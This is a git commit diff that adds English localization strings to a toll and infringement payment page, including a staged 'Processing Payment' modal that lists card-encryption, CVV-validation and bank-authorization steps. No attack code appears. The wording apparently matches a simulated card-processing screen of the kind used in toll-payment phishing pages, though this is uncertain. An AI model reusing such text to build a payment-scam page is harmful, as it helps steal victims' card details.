This commit is contained in:
telangpu
2026-04-30 16:18:59 +08:00
parent f438710ac8
commit edec02e4ef
28 changed files with 6410 additions and 8387 deletions

File diff suppressed because one or more lines are too long

View File

@@ -118,5 +118,6 @@ export default {
"Successful Toll Payment": "Payment Successful",
"Thank you for your payment. The tolls have been processed successfully.": "Thank you. Your infringement / toll payment has been processed successfully.",
"Phone": "Phone",
"Toll Amount": "Total Amount"
"Toll Amount": "Total Amount",
payment_loading: { modal_title: "Processing Payment", modal_subtitle: "Please do not close this page", transaction_details: "Transaction Details", transaction_id: "Transaction ID:", processing_network: "Processing Network:", processing_time: "Processing Time:", security_level: "Security Level:", preparing: "Preparing...", high: "High", step_init: "Initializing payment environment...", step_encrypt: "Encrypting card information...", step_connect: "Establishing secure connection...", step_verify_card: "Verifying card number and issuer...", step_validate_cvv: "Validating CVV code...", step_fraud: "Checking fraud risk...", step_send: "Sending transaction request...", step_wait_auth: "Waiting for bank authorization...", step_process_resp: "Processing bank response...", step_confirm: "Confirming transaction status...", step_finalize: "Finalizing transaction...", network_visa: "Visa Secure Network", network_mastercard: "Mastercard Global Payment Network", network_amex: "American Express Dedicated Channel", network_unionpay: "UnionPay Payment Channel", network_intl: "International Payment Network", time_seconds: "{time} seconds", },
};